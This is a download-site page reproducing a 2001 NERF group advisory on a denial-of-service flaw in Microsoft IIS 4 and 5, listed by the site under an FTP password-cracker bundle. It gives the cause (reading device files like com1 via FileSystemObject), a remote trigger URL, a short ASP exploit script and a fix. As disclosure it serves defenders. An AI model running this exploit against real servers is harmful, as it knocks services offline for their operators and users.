⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 nerf.iis.dos.txt

📁 一个FTP密码破解程序的源代码
💻 TXT
字号:
                             --== NERF gr0up security advisory #4 ==--                                    MS IIS local and remote DoS      1. Vulnerable soft: IIS 4,5   2. Description:Openning and reading of device files (com1, com2, etc.) using Scripting.FileSystemObject will crash ASP-processor (asp.dll). 3. Local exploit:If you have permission on creating .asp-file, you can crash ASP-processor. 4. Remote exploit:Sometimes filename passing as asp-script param, which open and read data from file. Passing param as device file willcrash asp-processor.http://host.int/scripts/script.asp?script=com1 5. Solution:Fix Scripting.FileSystemObject (have to check file for existing before openning. 6. ASP-Exploit: <%  Dim strFileName, objFSO, objFile   Set objFSO = Server.CreateObject("Scripting.FileSystemObject")   strFileName = "com1"   Set objFile = objFSO.OpenTextFile(strFileName)   Response.Write objFile.ReadAll   objFile.Close%> 7.Sorry:for poor english---------------------------------------------------Found by buggzy (buggzy@nerf.ru)NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -